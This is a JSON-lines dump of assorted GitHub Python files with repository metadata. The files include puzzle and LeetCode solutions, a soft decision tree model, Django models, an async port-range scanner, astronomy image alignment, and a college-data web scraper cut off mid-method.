2:\r\n if scan_possible(visited.union(poss[ship_type][b]), 1, 1, 0, poss): return True\r\n else:\r\n if scan_possible(visited.union(poss[ship_type][b]), ship_type, ship_num+1, b+1, poss): return True\r\n return False\r\n\r\n\r\nclass Tests(unittest.TestCase):\r\n def test_battlefield(self):\r\n self.assertEqual(True, validate_battlefield(\r\n [[1, 0, 0, 0, 0, 1, 1, 0, 0, 0],\r\n [1, 0, 1, 0, 0, 0, 0, 0, 1, 0],\r\n [1, 0, 1, 0, 1, 1, 1, 0, 1, 0],\r\n [1, 0, 0, 0, 0, 0, 0, 0, 0, 0],\r\n [0, 0, 0, 0, 0, 0, 0, 0, 1, 0],\r\n [0, 0, 0, 0, 1, 1, 1, 0, 0, 0],\r\n [0, 0, 0, 0, 0, 0, 0, 0, 1, 0],\r\n [0, 0, 0, 1, 0, 0, 0, 0, 0, 0],\r\n [0, 0, 0, 0, 0, 0, 0, 1, 0, 0],\r\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]]))\r\n\r\n\r\nif __name__ == \"__main__\":\r\n unittest.main()\r\n","repo_name":"HoggTruman/Code-Wars","sub_path":"3 kyu/Battleship Field Validator II.py","file_name":"Battleship Field Validator II.py","file_ext":"py","file_size_in_byte":2668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37247234474","text":"### ENUNCIADO PARA EJECUTAR PROGRAMA\n''' Mi amigo Jorge desea realizar una fiesta vip; pero el año anterior una persona se coló \nutilizando el mismo nombre de otra. Y por eso Jorgue decidió este año que el portero pidiera \nnúmero de documento. Pero es muy difícil para este hombre estar comprobando uno por uno los \nnúmeros, entonces entramos nosotros a hacer la magia del programador!!\n\nMensaje del pedido de Jorge!\n\nEl programa deberá permitirle al portero ingresar el número de documento de quien intente entrar\n y comprobar si existe en su lista, y una vez que se le dio un PERMITIDO ENTRAR debe mostrar cuántas \n personas restan entrar. Si la persona no está en la lista debe informar a seguridad!\n \n'''\n\n\ntotalInvitados=0\nresultado=0\n\nListaInvitados={\n \"Manuel\": 101,\n \"Josefina\":102,\n \"Tomas\":103,\n \"Jean Carlo\":104,\n \"Sharon\":105,\n \"Shantal\":106,\n \"Karina\":107,\n \"Samuel\":108,\n \"Jose\":109,\n \"Tito\":110,\n \"Carlos\":111,\n \"Andrea\":112,\n \"Sabrina\":113,\n \"Antonella\":114\n }\n\nfor x in ListaInvitados:\n resultado+=1\n\nrevisionDePersona=\"Manuel\"\n\nif revisionDePersona in ListaInvitados:\n print(\"Bienvenidos a la Fiesta de Jorge\")\n resultado-=1\n print(\"Restan: \", resultado, \" invitados para entrar llegar a la fiesta\")\nelse:\n print(\"Usted no se Encuentra en la Lista de Invitados\") \n print(\"Restan por Ingresar a la Fiesta: \", resultado)","repo_name":"jcmloiacono/Python3-Personal","sub_path":"Practicas Graficas/Graficas/Examen.py","file_name":"Examen.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42220813198","text":"fh = open('mbox-short.txt')\ncount = 0\nfor line in fh:\n line=line.rstrip()\n f=line.split()\n if len(f)<3:\n continue\n if f[0] != 'From':\n continue\n print(f[1])\n count=count+1\n\n\nprint(\"There were\", count, \"lines in the file with From as the first word\")\n","repo_name":"Khatri09/myPythonJourney","sub_path":"python/count_specificWordIn_a_line.py","file_name":"count_specificWordIn_a_line.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21772051834","text":"# -*- encoding: utf-8 -*-\n'''\nGiven a linked list and a value x, partition it such that all nodes less than x come before nodes greater than or equal to x.\n\nYou should preserve the original relative order of the nodes in each of the two partitions.\n\nFor example,\nGiven 1->4->3->2->5->2 and x = 3,\nreturn 1->2->2->4->3->5.\n'''\n\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def partition(self, head, x):\n \"\"\"\n :type head: ListNode\n :type x: int\n :rtype: ListNode\n \"\"\"\n \n q1 = ListNode(None)\n q2 = ListNode(None)\n h1, h2 = q1, q2\n\n p = head\n while p != None:\n if p.val < x:\n q1.next = ListNode(p.val)\n q1 = q1.next\n else:\n q2.next = ListNode(p.val)\n q2 = q2.next\n\n p = p.next\n\n q1.next = h2.next\n\n return h1.next\n\n\n\n\n\n","repo_name":"weixsong/algorithm","sub_path":"leetcode/86.py","file_name":"86.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"24584530226","text":"# -*- coding: utf-8 -*-\n'''' Soft Decision Tree '''\nimport torch\nimport torch.nn as nn\nfrom collections import OrderedDict\n\n\nclass SDT(nn.Module):\n \"\"\" Soft Desicion Tree \"\"\"\n def __init__(self, args):\n super(SDT, self).__init__()\n self.args = args\n self.device = torch.device('cuda' if self.args['cuda'] else 'cpu')\n self.inner_node_num = 2 ** self.args['depth'] - 1\n self.leaf_num = 2 ** self.args['depth']\n self.max_depth = self.args['depth']\n self.max_leaf_idx=None # the leaf index with maximal path probability\n \n # Different penalty coefficients for nodes in different layer\n self.penalty_list = [args['lamda'] * (2 ** (-depth)) for depth in range(0, self.args['depth'])] \n \n # inner nodes operation\n # Initialize inner nodes and leaf nodes (input dimension on innner nodes is added by 1, serving as bias)\n self.linear = nn.Linear(self.args['input_dim']+1, self.inner_node_num, bias=False)\n self.sigmoid = nn.Sigmoid()\n # temperature term\n if self.args['beta']:\n beta = torch.randn(self.inner_node_num)\n self.beta = nn.Parameter(beta)\n else:\n self.beta = torch.ones(1).to(self.device) # or use one beta across all nodes\n\n # leaf nodes operation\n # p*softmax(Q) instead of softmax(p*Q)\n param = torch.randn(self.leaf_num, self.args['output_dim'])\n self.param = nn.Parameter(param)\n self.softmax = nn.Softmax(dim=1)\n\n self.optimizer = torch.optim.Adam(self.parameters(), lr=self.args['lr'], weight_decay=self.args['weight_decay'])\n self.scheduler = torch.optim.lr_scheduler.ExponentialLR(self.optimizer, gamma=self.args['exp_scheduler_gamma'])\n\n def leaf_nodes(self, p):\n distribution_per_leaf = self.softmax(self.param)\n average_distribution = torch.mm(p, distribution_per_leaf)\n return average_distribution\n\n def inner_nodes(self, x):\n output = self.sigmoid(self.beta*self.linear(x))\n return output\n\n def get_tree_weights(self, Bias=False):\n \"\"\"Return tree weights as a list\"\"\"\n if Bias:\n return self.state_dict()['linear.weight'].detach().cpu().numpy() \n else: # no bias\n return self.state_dict()['linear.weight'][:, 1:].detach().cpu().numpy()\n\n\n def forward(self, data, LogProb=True):\n _mu, _penalty = self._forward(data)\n output = self.leaf_nodes(_mu) # average over leaves\n\n if self.args['greatest_path_probability']:\n one_hot_path_probability = torch.zeros(_mu.shape).to(self.device)\n vs, ids = torch.max(_mu, 1) # ids is the leaf index with maximal path probability\n one_hot_path_probability.scatter_(1, ids.view(-1,1), 1.)\n \n prediction = self.leaf_nodes(one_hot_path_probability)\n self.max_leaf_idx = ids\n\n else: # prediction value equals to the average distribution\n prediction = output\n\n if LogProb:\n output = torch.log(output)\n prediction = torch.log(prediction)\n\n weights = self.get_tree_weights(Bias=True)\n\n return prediction, output, _penalty, weights\n \n \"\"\" Core implementation on data forwarding in SDT \"\"\"\n def _forward(self, data):\n batch_size = data.size()[0]\n data = self._data_augment_(data)\n path_prob = self.inner_nodes(data)\n path_prob = torch.unsqueeze(path_prob, dim=2)\n path_prob = torch.cat((path_prob, 1-path_prob), dim=2)\n _mu = data.data.new(batch_size,1,1).fill_(1.)\n _penalty = torch.tensor(0.).to(self.device)\n \n begin_idx = 0\n end_idx = 1\n \n for layer_idx in range(0, self.args['depth']):\n _path_prob = path_prob[:, begin_idx:end_idx, :]\n _penalty= _penalty + self._cal_penalty(layer_idx, _mu, _path_prob) # extract inner nodes in current layer to calculate regularization term\n _mu = _mu.view(batch_size, -1, 1).repeat(1, 1, 2)\n _mu = _mu * _path_prob\n begin_idx = end_idx # index for each layer\n end_idx = begin_idx + 2 ** (layer_idx+1)\n mu = _mu.view(batch_size, self.leaf_num) \n\n return mu, _penalty # mu contains the path probability for each leaf \n \n \"\"\" Calculate penalty term for inner-nodes in different layer \"\"\"\n def _cal_penalty(self, layer_idx, _mu, _path_prob):\n penalty = torch.tensor(0.).to(self.device) \n batch_size = _mu.size()[0]\n _mu = _mu.view(batch_size, 2**layer_idx)\n _path_prob = _path_prob.view(batch_size, 2**(layer_idx+1))\n for node in range(0, 2**(layer_idx+1)):\n numerical_bound = 1e-7 # prevent numerical issue\n alpha = torch.sum(_path_prob[:, node]*_mu[:,node//2], dim=0) / (torch.sum(_mu[:,node//2], dim=0) + numerical_bound) # not dividing 0.\n origin_alpha=alpha\n # if alpha ==1 or alpha == 0, log will cause numerical problem, so alpha should be bounded\n alpha = torch.clamp(alpha, numerical_bound, 1-numerical_bound) # no log(negative value)\n alpha_list.append(alpha)\n if torch.isnan(torch.tensor(alpha_list)).any():\n print(origin_alpha, alpha)\n \n penalty -= self.penalty_list[layer_idx] * 0.5 * (torch.log(alpha) + torch.log(1-alpha))\n return penalty\n \n \"\"\" Add constant 1 onto the front of each instance, serving as the bias \"\"\"\n def _data_augment_(self, input):\n batch_size = input.size()[0]\n input = input.view(batch_size, -1)\n bias = torch.ones(batch_size, 1).to(self.device)\n input = torch.cat((bias, input), 1)\n return input\n\n def save_model(self, model_path, id=''):\n torch.save(self.state_dict(), model_path+id)\n\n def load_model(self, model_path, id=''):\n self.load_state_dict(torch.load(model_path+id, map_location='cpu'))\n self.eval()\n\n","repo_name":"quantumiracle/Popular-RL-Algorithms","sub_path":"SDT/SDT.py","file_name":"SDT.py","file_ext":"py","file_size_in_byte":6016,"program_lang":"python","lang":"en","doc_type":"code","stars":880,"dataset":"github-code","pt":"61"} +{"seq_id":"19799477524","text":"import math\n\nX,Y=map(float,input(\"Enter X Y: \").split())\n\ndef withdrawAmount(X):\n try:\n X = int(X)\n except ValueError:\n print(\"only expected number between 1 and 100\") \n if X in range(1,2001):\n return X \n else:\n print(\"wrong input!\")\n exit()\n\ndef accountBalance(Y):\n try:\n Y = float(Y)\n except ValueError:\n print(\"only expected number between 1 and 100\") \n if Y in range(1,2001):\n return Y \n else:\n print(\"wrong input!\")\n exit()\n\n\ndef cashWithdraw():\n a = withdrawAmount(X)\n b = accountBalance(Y)\n if a+0.5 <= b and a % 5 == 0:\n balance = float(b-a-0.50)\n else:\n balance = b\n return balance\n \ndef main():\n balance = cashWithdraw()\n print(balance)\n\nmain()\n","repo_name":"kykumar688/DSA","sub_path":"atm.py","file_name":"atm.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23566198571","text":"#!/usr/bin/env python\nimport numpy as np\n\ninFile = open('in.txt', 'r')\noutFile = open('out.txt', 'w')\nt = int(inFile.readline())\nfor i in range(1, t+1):\n N, K = map(int, inFile.readline().split(' '))\n stage = int(np.ceil(np.log2(K + 1)))\n done = 2**(stage - 1) - 1\n remain = N - done\n peopleRemain = K - done\n cells = int(float(remain)/(2**(stage - 1)))\n extra = remain % (2**(stage - 1))\n if(peopleRemain <= extra):\n cells += 1\n left = cells/2\n right = left\n if(cells % 2 == 0):\n right -= 1\n outFile.write(\"Case #{}: {} {}\\n\".format(i, left, right))\n # print left, right\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_201/1054.py","file_name":"1054.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16564959724","text":"# coding=utf-8\n\nfrom django.conf import settings\nfrom django.core.validators import MaxValueValidator\nfrom django.db import models\n\n# Create your models here.\n\nclass Estado(models.Model):\n iidestado = models.IntegerField('Id Estado', primary_key=True)\n cdescripcion = models.CharField('Estado',\n db_column='Descripcion',\n max_length=50,\n blank=True,\n null=True)\n\n class Meta(object):\n verbose_name_plural = 'Estados'\n\n def __str__(self):\n return '%s' % self.cdescripcion\n\n\nclass Municipio(models.Model):\n iidestado = models.ForeignKey(Estado)\n iidmunicipio = models.IntegerField('Id Municipio',\n db_column='Id Municipio',\n blank=False,\n null=True)\n cdescripcion = models.CharField('Municipio',\n db_column='Descripcion',\n max_length=50,\n blank=True,\n null=True)\n\n class Meta(object):\n verbose_name_plural = 'Municipios'\n\n def __str__(self):\n return '%s' % self.cdescripcion\n\n\nclass Ubicacion(models.Model):\n iidubicacion = models.AutoField('Id Ubicación',\n primary_key=True)\n iasentamiento = models.IntegerField('Asentamiento',\n blank=True,\n null=True)\n cdescripcion = models.CharField('Descripción',\n db_column='Descripcion',\n max_length=80,\n blank=True,\n null=True)\n icodigopostal = models.IntegerField('Codigo Postal',\n db_column='Codigo Postal',\n blank=True,\n null=True)\n iidmunicipio = models.ForeignKey(Municipio)\n iidestado = models.ForeignKey(Estado)\n\n class Meta(object):\n verbose_name_plural = 'Ubicaciones'\n\n def __str__(self):\n return '%s' % self.cdescripcion","repo_name":"egarnik80/catalogos","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27263372103","text":"# 첫 두 케이스만 정답 처리, 이후에는 오답\n# 왜 그런지 모르겠음\n\ndef main():\n dotNum = int(input())\n dotList = []\n for _ in range(dotNum):\n dot = list(map(int, input().split()))\n dotList.append(dot)\n \n answer = 0\n if dotNum < 3:\n print(0)\n exit()\n \n for i in range(dotNum-2):\n for j in range(1, dotNum-1):\n for k in range(2, dotNum):\n lineL1 = ((dotList[i][0]-dotList[j][0])**2+(dotList[i][1]-dotList[j][1])**2)**(1/2)\n lineL2 = ((dotList[k][0]-dotList[j][0])**2+(dotList[k][1]-dotList[j][1])**2)**(1/2)\n lineL3 = ((dotList[i][0]-dotList[k][0])**2+(dotList[i][1]-dotList[k][1])**2)**(1/2)\n lineLenList = [round(lineL1, 5), round(lineL2, 5), round(lineL3, 5)]\n lineLenList.sort()\n if lineLenList[0]+lineLenList[1] > lineLenList[2]:\n answer += 1\n print(answer)\nif __name__==\"__main__\":\n main()","repo_name":"elice-02-study-01-algorithm/python","sub_path":"CJ_Kim/season1/elice/03/num03.py","file_name":"num03.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"26595498908","text":"import asyncio\nimport socket\nimport struct\nimport typing\n\nfrom network_scanner import utils\nfrom network_scanner.ip_range import IPRange\nfrom network_scanner.port_checker import PortCheckerAsync\n\n\nclass AsyncRangeScanner(PortCheckerAsync):\n def __init__(self, ip_range: typing.Union[IPRange, None], ports: typing.Iterable,\n timeout: int = 3, ip_chunk_size: int = 100,\n port_chunk_size: int = 5, *args, **kwargs):\n super().__init__(ip=None, ports=ports, *args, **kwargs)\n self.ip_range = ip_range\n self.timeout = timeout\n self.ip_chunk_size = ip_chunk_size\n self.port_chunk_size = port_chunk_size\n\n async def check_ports(self, timeout=None, port_chunk_size=5, ip=None):\n ret = []\n for ip_chunk in utils.chunks(list(range(self.ip_range.start, self.ip_range.end)), self.ip_chunk_size):\n tasks = []\n for ip in ip_chunk:\n task = self.event_loop.create_task(super().check_ports(\n ip=socket.inet_ntoa(struct.pack('!L', ip)),\n timeout=timeout or self.timeout, port_chunk_size=self.port_chunk_size or port_chunk_size\n ))\n tasks.append(task)\n res = await asyncio.gather(*tasks)\n ret.extend(res)\n return ret\n\n\nclass AsyncToSyncRangeScanner(AsyncRangeScanner):\n def check_ports(self, timeout=3, port_chunk_size=5, ip=None):\n task = self.event_loop.create_task(super().check_ports(timeout=timeout,\n port_chunk_size=port_chunk_size,\n ip=ip))\n res = self.event_loop.run_until_complete(asyncio.gather(task))\n return res[0]\n","repo_name":"vitalya420/InternetScanner","sub_path":"network_scanner/range_scanner.py","file_name":"range_scanner.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70508390276","text":"import numpy as np\nfrom astropy.io import fits\nfrom astropy.wcs import WCS\nfrom astropy.coordinates import SkyCoord\nimport cv2\nimport re\nimport os\n\nimport utils\nimport const\n\n\ndef align_single(ref_header, band_path):\n ref_wcs = WCS(ref_header)\n ref_ra = ref_header['CRVAL1']\n ref_dec = ref_header['CRVAL2']\n\n band_file = fits.open(band_path)\n band_header = band_file[0].header\n band_data = band_file[0].data\n\n num_rows, num_cols = band_data.shape[:2]\n\n band_ra = band_header['CRVAL1']\n band_dec = band_header['CRVAL2']\n band_skycoord = SkyCoord(band_ra, band_dec, unit='deg')\n\n other_image_pixel_coords = band_skycoord.to_pixel(ref_wcs)\n other_x = other_image_pixel_coords[0]\n other_y = other_image_pixel_coords[1]\n ref_x = ref_header['CRPIX1']\n ref_y = ref_header['CRPIX2']\n x_shift = other_x - ref_x\n y_shift = other_y - ref_y\n\n translation_matrix = np.float32([[1, 0, x_shift], [0, 1, y_shift]])\n img = np.float32(band_data)\n img = cv2.warpAffine(img, translation_matrix, (num_cols, num_rows))\n return img\n\n\ndef align_spectral_bands(list_of_bands):\n sorted_list_of_bands = sorted(list_of_bands) # make sure it is sorted\n if len(sorted_list_of_bands) != 5:\n raise \"number of bands does not equal 5!\"\n\n g, i, r, u, z = tuple(sorted_list_of_bands)\n\n ref_file = fits.open(r)\n ref_header = ref_file[0].header\n ref_wcs = WCS(ref_header)\n ref_data = ref_file[0].data\n\n aligned_g = align_single(ref_header, g)\n aligned_u = align_single(ref_header, u)\n aligned_i = align_single(ref_header, i)\n aligned_z = align_single(ref_header, z)\n\n ref_file.close()\n\n result = np.dstack((aligned_i, ref_data, aligned_g, aligned_u, aligned_z))\n # result = cv2.flip(result, 0) # TODO: should i?\n\n # utils.display_image(result)\n\n return result\n\n\ndef group_bands(fits_files):\n grouping_dict = {}\n for f in fits_files:\n img_id = re.search(const.IMG_ID_REGEX, f).group()\n if img_id in grouping_dict:\n grouping_dict[img_id].append(f)\n else:\n grouping_dict[img_id] = [f]\n return grouping_dict\n\n\ndef align_grouped_bands(grouped_bands, aligned_data_dir):\n # aligning bands of the same image\n for item in grouped_bands.items():\n image_id, bands = item\n aligned_bands = align_spectral_bands(bands)\n\n path = os.path.join(aligned_data_dir, f\"{image_id}\")\n np.save(path, aligned_bands, allow_pickle=True)\n\n\ndef read_fits_files_and_align_them(fits_files_dir, dir_to_save_aligned):\n files = utils.listdir_fullpath(fits_files_dir)\n fits_files = list(filter(lambda f: re.search(\"[0-9]{4}.fits$\", f), files))\n\n grouped_bands = group_bands(fits_files)\n align_grouped_bands(grouped_bands, dir_to_save_aligned)\n\n\ndef main():\n aligned_data_dir = const.ALIGNED_DATA_DIR\n utils.create_dir_if_doesnt_exist(aligned_data_dir)\n\n read_fits_files_and_align_them(const.DATA_DIR, aligned_data_dir)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"kkulesz/AMLS_excercise","sub_path":"data_acquistion_and_alignment/align_data.py","file_name":"align_data.py","file_ext":"py","file_size_in_byte":3011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23637913971","text":"def diff(score, p):\r\n if (p == 0):\r\n return 0\r\n if (p >= score):\r\n return 100\r\n if (score / 3 >= p):\r\n return 0\r\n else:\r\n a = (score - p) / 2\r\n return p - a\r\n\r\ndef diff1(score,p):\r\n if (p == 0):\r\n return 0\r\n if (p > score):\r\n return 100\r\n if (score < p * 3 - 4):\r\n return 100\r\n if (score >= p * 3 - 4 and score < p * 3 - 2):\r\n return 2\r\n if (score >= p * 3 -2 and score < p * 3):\r\n return 1\r\n return 0\r\n \r\n\r\ndef num_p(line):\r\n inp = line.split()\r\n N = int(inp[0])\r\n S = int(inp[1])\r\n p = int(inp[2])\r\n count = 0\r\n count_odd = 0\r\n for i in range(3,len(inp)):\r\n d = diff(int(inp[i]), p)\r\n if (d < 2):\r\n count += 1\r\n if (d == 2):\r\n count_odd += 1\r\n \r\n\r\n if (count_odd > S):\r\n count_odd = S\r\n count += count_odd\r\n return count\r\n\r\ndef num_p1(line):\r\n inp = line.split()\r\n N = int(inp[0])\r\n S = int(inp[1])\r\n p = int(inp[2])\r\n count = 0\r\n count_odd = 0\r\n for i in range(3,len(inp)):\r\n d = diff1(int(inp[i]), p)\r\n if (d < 2):\r\n count += 1\r\n if (d == 2):\r\n count_odd += 1\r\n \r\n\r\n if (count_odd > S):\r\n count_odd = S\r\n## if (count_odd != S):\r\n## print \"!!!\", line\r\n count += count_odd\r\n return count\r\n\r\nf = open('C:\\\\B-large.in')\r\nf_out = open('C:\\\\res.txt','r+')\r\nj = 0\r\nn = 0\r\nfor line in f:\r\n if (j == 0):\r\n n = int(line)\r\n j = j + 1\r\n continue\r\n f_out.write(\"Case #\"+str(j)+\": \"+str(num_p1(line))+'\\n')\r\n #print line, num_p(line), num_p1(line)\r\n j = j + 1\r\n\r\n\r\nf.close()\r\nf_out.close()\r\n\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_96/1273.py","file_name":"1273.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4322460375","text":"\n# TODO: clean this import stuff up (breaking up a monolithic script is a pain to refactor)\nfrom .config import CONFIG\nfrom .util import *\nfrom .fields import *\nimport json\n\nclass School:\n def __init__(self, url):\n self.urls =dict()\n self.urls['main'] = url\n self.urls['cost'] = url+ 'cost/'\n self.urls['admissions'] = url+ 'admissions/'\n self.urls['academics'] = url + 'academics/'\n self.urls['fa'] = url + 'scholarships-financial-aid/'\n self.urls['loans'] = url + 'student-loans/'\n self.row = dict(Niche = url)\n print(url)\n self.parse()\n self.compute_fields()\n\n def sum(self, *fields, todol=True):\n res = sum(dol2int(self.row.get(f, '0')) for f in fields)\n if todol:\n return int2dol(res)\n return res\n \n def housing_needed(self):\n if self.row.get('LoC', '') == '100%': \n return True\n if self.row.get('LoC Required', '') == 'Yes':\n return True\n return self.row.get('Miles', 0) > CONFIG.geo.HousingDistance\n\n def is_instate(self):\n return self.row.get('State', '') == CONFIG.geo.HomeState\n \n def compute_fields(self):\n self.row['Miles'] = get_miles(self.latitude, self.longitude)\n self.row['Travel'] = get_travel(self.row['Miles'])\n \n self.row['Avg FA $110k+'] = int2dol(dol2int(self.row['Tuition OoS'])-\n dol2int(self.row['$110k+ Net']))\n\n self.row['IS Tot'] = self.sum('Tuition IS','Housing','Meal','Supplies')\n self.row['OoS Tot'] = self.sum('Tuition OoS','Housing','Meal','Supplies')\n self.row['Com Tot'] = self.sum('Tuition IS','Meal','Supplies')\n\n tosum = ['Supplies']\n tt = ''\n if self.is_instate():\n tosum.append('Tuition IS')\n tt+='IS '\n else:\n tosum.append('Tuition OoS')\n tt+='OoS '\n if self.housing_needed():\n tosum.extend(['Housing', 'Meal'])\n if self.sum('Housing', todol=False) == 0:\n tt+='Rent'\n else:\n tt+='Dorm'\n else:\n tt+='Home'\n\n self.row['Total'] = self.sum(*tosum)\n self.row['TBasis'] = tt\n \n self.row['Size'] = get_size(self.sum('Fulltime', 'Parttime', todol=False))\n\n def _parse_main(self, bs):\n \"\"\"\n \"\"\"\n # Name/Name\n self.row['Name'] = bs.h1.contents[0]\n print(self.row['Name'])\n\n # lon/lat\n lon = bs.find('meta', property='place:location:longitude')\n jsd = bs.find_all('script', type='application/ld+json')[-1].text\n self.row['State'] = json.loads(jsd)['address']['addressRegion']\n self.longitude = float(lon.get('content'))\n self.latitude = float(bs.find('meta', property='place:location:latitude').get('content'))\n\n # Urls/[Apply, Visit, School, Info]\n buttons = bs.find_all(class_=\"button\")\n #self.row['Apply'] = buttons[1].get('href') # problem\n #self.row['Visit'] = buttons[2].get('href') # problem\n #self.row['Info'] = buttons[-3].get('href') # problem\n self.row['School'] = bs.find_all(class_=\"profile__website__link\")[0].get('href')\n\n # Ranks/*\n self.row['Overall'] = bs.find(class_=\"overall-grade__niche-grade\").text\n ranks = bs.find_all(class_=\"profile-grade--two\")\n self.row.update({g.contents[0].text: g.contents[1].text for g in ranks})\n\n # Academics/[Fulltime,Parttime]\n students = bs.find(id=\"students\").find_all(class_=\"scalar__value\")\n self.row['Fulltime'] = students[0].contents[0].text\n self.row['Parttime'] = students[1].text\n\n # Academics/[S:T, Evening]\n acc = bs.find(id=\"academics\").find_all(class_=\"scalar__value\")\n self.row['S:T'] = acc[0].text\n self.row['Evening'] = acc[1].text\n \n # Academics/[Grad$, Grad%, Emp%]\n after = bs.find(id=\"after\").find_all(class_=\"scalar__value\")\n self.row['Grad$'] = after[0].contents[0].text\n self.row['Grad%'] = after[1].contents[0].text\n self.row['Emp%'] = after[2].contents[0].text\n \n # Academics/LoC\n loc = bs.find(id=\"campus-life\")\n if loc: loc = loc.find(class_=\"scalar__value\")\n self.row['LoC'] = loc.text if loc else EMDASH\n \n\n def _parse_cost(self, bs):\n \"\"\"\n \"\"\"\n # Aid/FA%\n net = bs.find(id=\"net-price\")\n sv = net.find_all(class_='scalar--three')\n self.row['FA%'] = sv[-1].contents[-1].text.split('/')[0]\n self.row['Avg FA'] = sv[-2].contents[-1].text.split('/')[0]\n\n # Urls/Calc\n self.row['Calc'] = net.find(class_=\"profile__website__link\").get('href')\n\n # Aid/$110k+ Net\n self.row['$110k+ Net'] = net.find_all(class_=\"fact__table__row__value\")[-1].contents[0]\n\n # Cost/[Tuition *, Housing, Meal, Supplies]\n sticker = bs.find(id=\"sticker-price\")\n buckets = sticker.find_all(class_=\"blank__bucket\")\n self.row['Tuition IS'] = buckets[0].find(class_=\"scalar__value\").span.text\n self.row['Tuition OoS'] = buckets[1].find(class_=\"scalar__value\").span.text\n\n vals = sticker.find_all(class_=\"scalar--three\")\n\n self.row['Housing'] = vals[0].contents[-1].text.split('/')[0]\n self.row['Meal'] = vals[1].contents[-1].text.split('/')[0]\n self.row['Supplies'] = vals[2].contents[-1].text.split('/')[0]\n\n # Aid/[No Increase, Installments, PrePay]\n self.row['No Increase'] = vals[3].contents[-1].text\n self.row['Installments'] = vals[4].contents[-1].text\n self.row['PrePay'] = vals[5].contents[-1].text\n\n def _parse_fa(self, bs):\n \"\"\"\n \"\"\"\n self.row['Aid'] = bs.find(class_='profile__website__link').get('href')\n\n bd = bs.find(id='financial-aid-breakdown').find_all(class_='fact__table__row__value')\n self.row['Fed%'] = bd[0].text\n self.row['Fed$'] = bd[4].text\n self.row['State%'] = bd[1].text\n self.row['State$'] = bd[5].text\n self.row['Inst%'] = bd[2].text\n self.row['Inst$'] = bd[6].text\n self.row['Pel%'] = bd[3].text\n self.row['Pel$'] = bd[7].text\n \n def _parse_loans(self, bs):\n \"\"\"\n \"\"\"\n loans = bs.find(class_='blank__bucket')\n try:\n self.row['Loan$'] = loans.contents[1].find(class_='scalar__value').span.text\n except:\n self.row['Loan$'] = EMDASH\n vals = loans.find_all(class_='scalar--three')\n self.row['Loan%'] = vals[0].contents[-1].text\n self.row['Default%'] = vals[1].contents[1].span.text\n\n\n def _parse_academics(self, bs):\n \"\"\"\n \"\"\"\n # Academics/[Fulltime%, Parttime%, Calendar]\n vals = bs.find_all(class_=\"scalar--three\")\n self.row['Fulltime%'] = vals[0].contents[-1].text\n self.row['Parttime%'] = vals[1].contents[-1].text\n self.row['Calendar'] = vals[2].contents[-1].text\n\n\n def _parse_admissions(self, bs):\n \"\"\"\n \"\"\"\n stats = bs.find(id=\"admissions-statistics\")\n if not stats:\n self.row['Acceptance Rate'] = '100%'\n return\n buckets = stats.find_all(class_=\"blank__bucket\")\n self.row['Acceptance Rate'] = buckets[0].contents[-1].contents[-1].text\n self.row['SAT'] = buckets[2].contents[0].contents[-1].text\n self.row['ACT'] = buckets[3].contents[0].contents[-1].text\n\n vals = stats.find_all(class_=\"scalar--three\")\n self.row['Early Rate'] = vals[0].contents[-1].text\n self.row['Applicants'] = vals[1].contents[-1].text\n self.row['SAT Reading'] = vals[2].contents[-1].text\n self.row['SAT Math'] = vals[3].contents[-1].text\n self.row['SAT%'] = vals[4].contents[-1].text\n self.row['ACT English'] = vals[5].contents[-1].text\n self.row['ACT Math'] = vals[6].contents[-1].text\n self.row['ACT Writing'] = vals[7].contents[-1].text\n self.row['ACT%'] = vals[8].contents[-1].text\n\n dead = bs.find(id=\"admissions-deadlines\")\n buckets = dead.find_all(class_=\"blank__bucket\")\n self.row['Deadline'] = buckets[0].contents[0].contents[-1].text\n self.row['Fee'] = buckets[1].contents[0].contents[-1].text\n\n vals = dead.find_all(class_=\"scalar--three\")\n self.row['Decision Deadline'] = vals[0].contents[-1].text\n self.row['Action Deadline'] = vals[1].contents[-1].text\n\n self.row['Early Decision'] = vals[2].contents[-1].text\n self.row['Early Action'] = vals[3].contents[-1].text\n self.row['Common App'] = vals[4].contents[-1].text\n self.row['Coalition App'] = vals[5].contents[-1].text\n\n try:\n self.row['Apply'] = dead.find(class_='profile__website__link').get('href')\n except:\n pass\n\n vals = bs.find(id=\"admissions-requirements\").find_all(class_=\"fact__table__row__value\")\n self.row['HS GPA'] = vals[0].text\n self.row['HS Rank'] = vals[1].text\n self.row['HS Transcript'] = vals[2].text\n self.row['Col Prep Courses'] = vals[3].text\n self.row['SAT/ACT'] = vals[4].text\n self.row['Recomendations'] = vals[5].text\n\n def parse(self):\n \"\"\"\n Parse all the pages into the primary row data.\n \"\"\"\n for page, url in self.urls.items():\n 